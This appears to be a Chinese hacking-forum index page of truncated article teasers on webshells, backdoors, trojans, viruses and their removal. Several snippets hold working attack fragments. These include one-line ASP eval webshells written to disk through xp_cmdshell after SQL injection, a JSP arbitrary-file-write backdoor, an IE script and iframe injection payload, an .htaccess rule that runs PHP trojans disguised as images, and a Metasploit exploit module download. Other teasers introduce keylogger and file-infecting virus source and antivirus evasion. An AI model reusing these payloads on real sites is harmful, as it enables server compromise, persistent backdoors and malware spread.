今天说的是在管理员的后台登陆界面隐藏我们的后门，这是相对比较安全的，因为管理员的入口不是 经常换的，只要他的登陆界面在，我们的后门就在！ 1.从我们的SHELL上找到管理员的入口页面 2.编辑它 在最后面...

[阅读全文]

TXT文件中插入一段JAVA代码后后边的HTML代码就会被IE执行 受影响版本IE6 7 8 代码： ‘><script>alert(sb)</script> <iframe src=http://xxxxx.org width=500 height=500></iframe> 演示: 引用:...

[阅读全文]

注入点是SA权限. xp_cmdshell是存在的. 找到网站主目录 dir d:\wwwroot 找到站点的目录后. Echo ^<%eval request("#")%>^ >d:\wwwroot\xx\ok.asp echo ^<%eval request("#")%^> >d:\wwwroot\xx\ok.asp echo...

[阅读全文]

在进一步入侵服务器时,上传的文件会被服务器过滤掉,我们上传的WEBSHLL就无法运行了！ 　以蓝屏最小ASP木马为例子！进行如下修改。 　原来代码是<%execute request("cmd")%> 把标签修改替换下来 为 　<scrip...

[阅读全文]

俗语说的好,"前有狼,后有虎",虎年,对于互联网就像一个猛兽之年... 春节前大面积爆发的"极虎"病毒还让人心有余悸,黑色产业链"趁热打铁",目前国内兽兽门事件正热,趁大量围观群众在网上疯求"兽兽门"视频下载地...

[阅读全文]

一、鬼影病毒概述 　这是一个木马下载器，使用了ring3恢复内核钩子、感染磁盘引导区（MBR）、多种方法结束杀毒软件等技术自启动并对抗杀毒软件。完全感染后，是一个看不到可疑文件、没有启动项、普通重装系统也无法...

[阅读全文]

一、下载http://www.rec-sec.com/exploits/msf/ie_iepeers_pointer.rb 二、放到C:\Metasploit\Framework3\msf3\modules\exploits\test。我改个了名字叫ie.rb 三、启动msfconsole 四、msf > use exploit/test/ie...

[阅读全文]

在上一篇木马病毒隐身穿墙术解密中，已经对修改木马特征码和加壳方式和应对之策做了一个大致的了解，但木马的隐身和穿墙术远不止这两种，今天我们要了解的，就是另外两种攻击者喜欢使用的木马隐身技术：给木马程序加...

[阅读全文]

现在，木马病毒在各种安全防范措施的拦截之下，依然没有任何减少的迹象，甚至还在向更多的方向发展。在防范木马程序这个问题上，造成当前这种局面的主要因素之一，就是木马病毒的开发者和使用者，总是在不断地开发...

[阅读全文]

现在，木马病毒在各种安全防范措施的拦截之下，依然没有任何减少的迹象，甚至还在向更多的方向发展。在防范木马程序这个问题上，造成当前这种局面的主要因素之一，就是木马病毒的开发者和使用者，总是在不断地开发各...

[阅读全文]

先来睇睇网马代码 ,一句句来分析 红色个系注释 <%xu="&礴&jos&uhpLYU&礴&jos&ljgzg&礴&jos&uhpIu{tzLork&礴&ut&kxxux&xky{sk&tk~z&礴&Ykz&...

[阅读全文]

<% if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes()); %> 提交客户端 程序代码...

[阅读全文]

网站被黑，被植入后门，这是管理员们无论如何都无法忍受的。Web服务器被攻克不算，还“城门失火殃及池鱼”，网站的浏览者也不能幸免。这无论是对企业的信誉，还是对管理员的技术能力都是沉重的打击。下面笔者结合实...

[阅读全文]

下面是JSP木马程序原代码: 文件名 adminIndex.jsp 注意:这里用到了一个包. org.apache.commons.fileupload.* 如果你有了这个包,可以把页面中 注释的部分去掉.即可实现文件上传功能. 这个是上传文件用的包 commons...

[阅读全文]

这是一只纯ASM编写的病毒，具备文件感染，入口代码变形，自身加密，EPO等功能，是一只无任何特征码的病毒，设计目的是为对抗反病毒软件的特征码杀毒、行为杀毒和虚拟机杀毒，现有代码未提供任何破坏功能，但会主动感...

[阅读全文]

一、 介绍 　写这篇文章的目的主要是对最近写的一个Linux病毒原型代码做一个总结，同时向对这方面有兴趣的朋友做一个简单的介绍。阅读这篇文章你需要一些知识，要对ELF有所了解、能够阅读一些嵌入了汇编的C代码、了解...

[阅读全文]

由于web网页木马有伪装性很强，而且杀毒软件对于一些web网页木马没有查杀能力，这种情况下，我们可以根据电脑工作时的表现识别web网页木马。通常，感染了web网页木马的电脑，有以下几种现象： 　1、系统反应速度变慢...

[阅读全文]

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ; 仿机器狗的感染文件代码 ; by naitm(http://hi.baidu.com/naitm) ; ; ml /c /coff /nologo userinit.asm ; Link /align:0x10 /...

[阅读全文]

网友在平时进行系统安全检测时一般都会采取全盘扫描的方法，殊不知全盘扫描既浪费时间，又在无形中缩短了硬盘的寿命。下面介绍的新方法，只需扫描一个文件夹，同样可以达到全盘扫描的效果！ 跟病毒作斗争久了，大家...

[阅读全文]

运行环境：Linux + apache 将php木马后缀改成图片类后缀，然后在木马目录或其根目录创建一个.htaccess文件（或在原有的.htaccess文件中加入） <FilesMatch "文件名"> SetHandler application/x-httpd-php ...

[阅读全文]

通常，微软IE工作过程描述如下： 　作为网页挂马的散布者，其目的是将木马下载到用户本地，并进一步执行，当木马获得执行之后，就意味着会有更多的木马被下载，进一步被执行，进入一个恶性的循环，从而使用户的电...

[阅读全文]

#define _WIN32_WINNT 0x0501 #include <windows.h> // Definitions int LogKey(HANDLE hLog, UINT vKey); LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam); int WINAPI WinMa...

[阅读全文]

这个shell的界面还是不错的，清爽淡雅，可惜后门还是大大的。 这个程序的加密较为复杂，除了常规的VBScript.Encode加密外，还采用了至少3个自定义函数加密。这3个函数的解密函数为 程序代码 Function ...

[阅读全文]

面对日新月异的病毒和木马，有时利用手工检查及清除病毒，还是有必要的，本文以伪装成系统的Wmiprvse.exe进程木马为例，来对其木马的清除做以循序渐进的讲解。 　首先，按住键盘上的“Ctrl+Alt+Del”键，将“任务管...

[阅读全文]

现在都流行用flash挂马了，一般都用SWF Encrypt来加密，很难反编译出其中的AS脚本。但是基于无论是AS还是JS来heapspray，其中都会调用import flash.external.*;ExternalInterface.call("eval","xxxx");。如果是这种形...

[阅读全文]

安全机构监测到一个“大胆”的“色情炸弹”变种aey病毒， 该病毒会将淫秽图片设置为用户的桌面壁纸，同时删除用户计算机上除C盘外，D盘到G盘分区中的全部文件，给用户带来巨大的、无法挽回的损失。 据反病毒专家介绍...

[阅读全文]

Svchost.exe在windows进程中占据很大一部分的资源，而且这个进程非常容易被病毒所利用。Svchost.exe被病毒利用之后，系统常会弹出Svchost.exe错误，当然Svchost病毒也有专杀工具。那么Svchost.exe是什么进程?Svchost...

[阅读全文]

如果你是Windows2k 或xp的用户，那么你一仔细看咯，在这里教大家一招金蝉脱窍 ―― 而且只需要这一招克就能死所有病毒!! 如果你是新装的系统(或者是你能确认你的系统当前是无毒的)，那就再好不过了，现在就立即就打开...

[阅读全文]

朋友说网站被入侵了,刚清除后不久又被挂上,感觉有个自动挂马的程序,于是写了个清除的程序和挂马的小脚本程序. 核心代码: For Each jkfile In Folder_Obj.files If FSO.GetExtenSionName(Lcase(jkfile))="asp" O...

[阅读全文]

Ecshop是一套网络商城建站系统，主要服务于想快捷搭建商城系统的用户，该系统是个人建立商城的主流软件。 　在网络上，主要有两种类型的网络购物，一类是像淘宝这样的C2C网站，另一类是像卓越这样的B2C网站。B2C网站...

[阅读全文]

1、最易被“挂马”的几类网站及防范 　挂马这个词目前我们似乎经常能听到，那么什么是挂马呢?挂马就是黑客入侵了一些网站后，将自己编写的网页木马嵌入被黑网站的主页中，利用被黑网站的流量将自己的网页木马传播开...

[阅读全文]

附：要学习VBS专杀的写法可以参考我以前这篇文章《VBS编程打造自己的病毒专杀工具》，抛砖引玉罢了……多谢小G，这套模板才得以及时趋于完善，不足之处自然还很多。也希望大家的加入。众人拾柴火焰高嘛。 '-病毒专杀...

[阅读全文]

免杀甲壳虫专版远控软件时的一个启发，对各位免杀朋友绝对有所帮助和启发。 今天在做甲壳虫专版远程控制的免杀时，碰到个小麻烦，后来多方面思考解决了 ，觉得这段免杀过程有点意思，希望对某些免杀的朋友有帮助。...

[阅读全文]